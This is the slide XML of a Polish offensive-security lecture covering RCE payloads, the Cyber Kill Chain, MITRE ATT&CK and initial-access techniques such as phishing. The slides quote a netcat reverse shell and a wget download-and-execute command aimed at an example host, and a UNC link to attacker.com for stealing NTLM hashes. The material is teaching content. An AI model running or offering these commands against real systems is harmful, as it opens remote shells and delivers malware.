            <a:ext cx="11283120" cy="511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Komenda wykonana na zdalnym systemie w tym przypadku pobiera dodatkowy program/skrypt ze zdalnego serwera (np. kod bardziej zaawansowanego reverse shella/RAT-a z funkcjonalnością reverse shella) i wykonuje go (tzw. download &amp; exec):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US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="c0c0c0"/>
                </a:highlight>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>wget https://hackingiscool.pl/update.sh -O /tmp/update.sh; chmod +x /tmp/update.sh; /tmp/update.sh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114" name="Picture 3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1365120" y="3085560"/>
            <a:ext cx="8710200" cy="2790720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4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754200" y="137880"/>
            <a:ext cx="11376720" cy="1051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Eksploitacja RCE - payload</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454320" y="1458000"/>
            <a:ext cx="11283120" cy="530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Obydwa pokazane wcześniej przykłady komend użytych przy eksploitacji, tj.:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="c0c0c0"/>
                </a:highlight>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>nc -e /bin/bash hackingiscool.pl 4444</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="c0c0c0"/>
                </a:highlight>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>wget https://hackingiscool.pl/update.sh -O /tmp/update.sh; chmod +x /tmp/update.sh; /tmp/update.sh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w kontekście eksploitacji określa się jako </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>payload 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(z ang. "ładunek").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Payload wykonujący czynność </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>download &amp; exec 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często określa się terminem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>dropper/first stage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, służy on dostarczeniu do atakowanego systemu właściwego złośliwego programu.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Program pobrany i wykonany w wyniku </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>download &amp; exec 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to tzw. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>second stage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 (najczęściej jakaś forma RAT z funkcją reverse shella).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Zarówno payload jak i second stage zaliczamy do malware.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Stosowane payloady:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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download &amp; exec (najczęściej),</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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dodanie nowego użytkownika,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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odczyt konkretnego pliku (np. z hasłem/wrażliwą konfiguracją/bazą danych),</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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inna pojedyncza komenda.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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Perspektywa i myślenie ofensywne - Cyber Kill Chain</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4180" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6205680" y="1502280"/>
            <a:ext cx="4239000" cy="5050440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296040" y="6553080"/>
            <a:ext cx="46098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Źródło: lockheedmartin.com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0" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504720" y="1676520"/>
            <a:ext cx="5239080" cy="404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</a:rPr>
              <a:t>Cyber Kill Chain - zaproponowany przez LockheedMartin schemat (framework) obrazujący kolejne etapy wtargnięcia do infrastruktury komputerowej</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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</a:rPr>
              <a:t>Termin "kill chain" wywodzi się z wojskowości, odzwierciedla struturę ataku na dany cel</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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</a:rPr>
              <a:t>Siłą rzeczy, kill chain strukturyzuje również perspektywę defensywną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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Perspektywa i myślenie ofensywne - ATT&amp;CK MATRIX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22" name="TextBox 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955800" y="2715480"/>
            <a:ext cx="10279800" cy="383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baza wiedzy o ofensywnych taktykach i technikach</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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publicznie dostępna</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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aktywnie rozwijana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wyewoluowana z Cyber Kill Chain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podstawa budowania</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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metodologii bezpieczeństwa</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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modeli zagrożeń (ang. Threat Models)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23" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114560" y="1467720"/>
            <a:ext cx="5447880" cy="124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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Perspektywa i myślenie ofensywne - ATT&amp;CK MATRIX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4180" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278720" y="1562760"/>
            <a:ext cx="10179720" cy="4761720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446840" y="6409800"/>
            <a:ext cx="83350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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://attack.mitre.org/resources/enterprise-introduction/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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Perspektywa i myślenie ofensywne - PRE ATT&amp;CK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28" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189440" y="6488640"/>
            <a:ext cx="83350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https://attack.mitre.org/tactics/pre/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9" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010520" y="1704240"/>
            <a:ext cx="9637560" cy="351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Zbieranie informacji (information gathering)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Jednostki biznesowe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Ludzie</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Używane technologie</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Stosowane praktyki</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Infrastruktura</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Identyfikacja słabości</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Selekcja celów (path of least resistance)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Przygotowanie i przetestowanie ataku</a:t>
            </a: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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Perspektywa i myślenie ofensywne - PRE ATT&amp;CK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31" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189440" y="6488640"/>
            <a:ext cx="83350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https://attack.mitre.org/tactics/pre/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2" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="772560" y="1363680"/>
            <a:ext cx="11001960" cy="4902120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ATT&amp;CK for Enterprise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34" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189440" y="6488640"/>
            <a:ext cx="83350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https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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://attack.mitre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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.org/matrices/enterprise/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5" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="916200" y="1055520"/>
            <a:ext cx="10714680" cy="5098320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access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37" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="921600"/>
            <a:ext cx="11147760" cy="460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Wstępny dostęp, określany też często jako </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>foothold</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Obligatoryjny, niezbędny etap każdego udanego wtargnięcia</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Zazwyczaj najtrudniejszy w uzyskaniu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Najczęściej jest to dostęp na poziomie możliwości wykonania dowolnego kodu (RCE) w którymś z systemów należących do celu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Uzyskanie wstępnego dostępu otwiera cały szereg nowych możliwości:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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dostęp do informacji o zwyczajach, konfiguracjach, politykach, używanym oprogramowaniu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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dostęp do informacji o użytkownikach</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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dostęp do haseł</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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nowy wektor ataku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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619640" y="78840"/>
            <a:ext cx="943200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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>HACKING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49" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489600" y="1073160"/>
            <a:ext cx="11446200" cy="469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Tzw. "etyczny hacking" jest w </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>mojej personalnej opinii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niewłaściwym sformułowaniem (wobec tego go nie używam) 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😃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Fraza ta narzuca założenie, że hacking sam w sobie jest czymś niemoralnym/nieetycznym/przestępczym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Spłyca całe pojęcie wyłącznie do nielegalnego włamywania się do systemów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Nie spotyka się określeń jak np. "etyczna inżynieria", "etyczna medycyna", "etyczne strzelectwo" itd.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W </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>mojej personalnej ocenie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termin ten jest używany na pokaz (ang.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</a:rPr>
              <a:t>virtue signaling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- zdobywanie aprobaty i akceptacji społecznej w wyniku afiszowania się swoją rzekomo słuszną i moralnie właściwą postawą)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Co więcej, prawdziwy świat nie zawsze jest taki prosty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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access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39" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="821520" y="1378800"/>
            <a:ext cx="11147760" cy="393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Techniki MITRE:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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1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Drive-by Compromise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1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https://attack.mitre.org/techniques/T1189/ </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Exploit Public-Facing Application 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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1190/ </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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External Remote Services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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1133/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Hardware Additions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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1200/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Phishing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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1566/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Replication Through Removable Media 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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1091/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Supply Chain Compromise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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1195/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Trusted Relationship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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1199/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Valid Accounts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100" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1078/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Exploit Public Facing Application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41" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="2198160"/>
            <a:ext cx="11147760" cy="406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Zaatakowanie aplikacji dostępnej przez Internet, zazwyczaj poprzez podatność prowadzącą do RCE </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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publicznie dostępny exploit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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niedostępny publicznie exploit na publicznie znaną podatność (CVE)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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niedostępny publicznie exploit na nieznaną publicznie podatność (0day) - dotyczy również wewnętrznych zamkniętych prywatnych produktów nieobjętych systemem CVE (RCE w blackboksie)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - External Remote Services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43" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="1801440"/>
            <a:ext cx="11147760" cy="429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</a:rPr>
              <a:t>Zaatakowanie dostępnych przez Internet usług dostępu zdalnego, np.:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>VPN (Virtual Private Network)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>Usługi pulpitu zdalnego, jak:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>VNC (Virtual Network Computing)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>RDP (Remote Desktop Protocol)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>Citrix</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>Windows Remoting</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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3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</a:rPr>
              <a:t>Ataki mogą się odbyć z wykorzystaniem:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>eksploitów</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>prawidłowych kont użytkowników (Valid accounts)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Hardware Additions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45" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699480" y="1297800"/>
            <a:ext cx="11147760" cy="427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Fizyczne umieszczanie w docelowej infrastructurze (sieci, budynku, otoczeniu) dedykowanego sprzętu umożliwiającego atakującemu jakąś formę dostępu:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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podsłuch</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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kamera</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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przechwytywanie ruchu sieciowego</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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aktywny dostęp do sieci</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Microsoft YaHei"/>
              </a:rPr>
              <a:t>wstrzykiwanie sekwencji klawiszy w sposób nierozróżnialny od tego, gdyby pochodziły z fizycznej klawiatury - interfejs HID (Rubber Ducky, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>Bash Bunny</a:t>
            </a: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Microsoft YaHei"/>
              </a:rPr>
              <a:t>) - ten w</a:t>
            </a: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ektor ataku jest szczególnie często wykorzystywany przez testerów penetracyjnych (Pentest/Red Team)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Phishing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47" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="1050840"/>
            <a:ext cx="11147760" cy="511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Phishing to komunikacja (najczęściej pisana, ale może być też głosowa) podszywająca się pod podmiot zaufany dla ofiary (używająca zatem elementu socjotechniki - ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>social engineering</a:t>
            </a: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).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Najczęściej wykorzystywaną formą jest e-mail.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Inne formy to:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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SMS (SMSishing)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Telefon (Vishing)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Wiadomości prywatne na komunikatorach i portalach</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Listy/pisma w formie papierowej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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Phishing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49" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804960" y="797400"/>
            <a:ext cx="11147760" cy="521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Wyróżniamy trzy podstawowe cele ataków phishingowych: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Dostarczenie malware na komputer ofiary:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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zainfekowane załączniki - najpopularniejsze są pliki pakietu office z osadzonymi złośliwymi makrami VBA</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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RCE exploit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Przekonanie ofiary do wyjawienia swojego hasła (lub innych danych poświadczających tożsamość)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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fałszywe strony logowania</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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wbudowane linki UNC (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>\\attacker.com\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) mające na celu wykradnięcie hasha NTLM (Windows) celem złamania hasła atakiem słownikowym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Zdobycie informacji potrzebnych do zaplanowania/przygotowania innych ataków</a:t>
            </a:r>
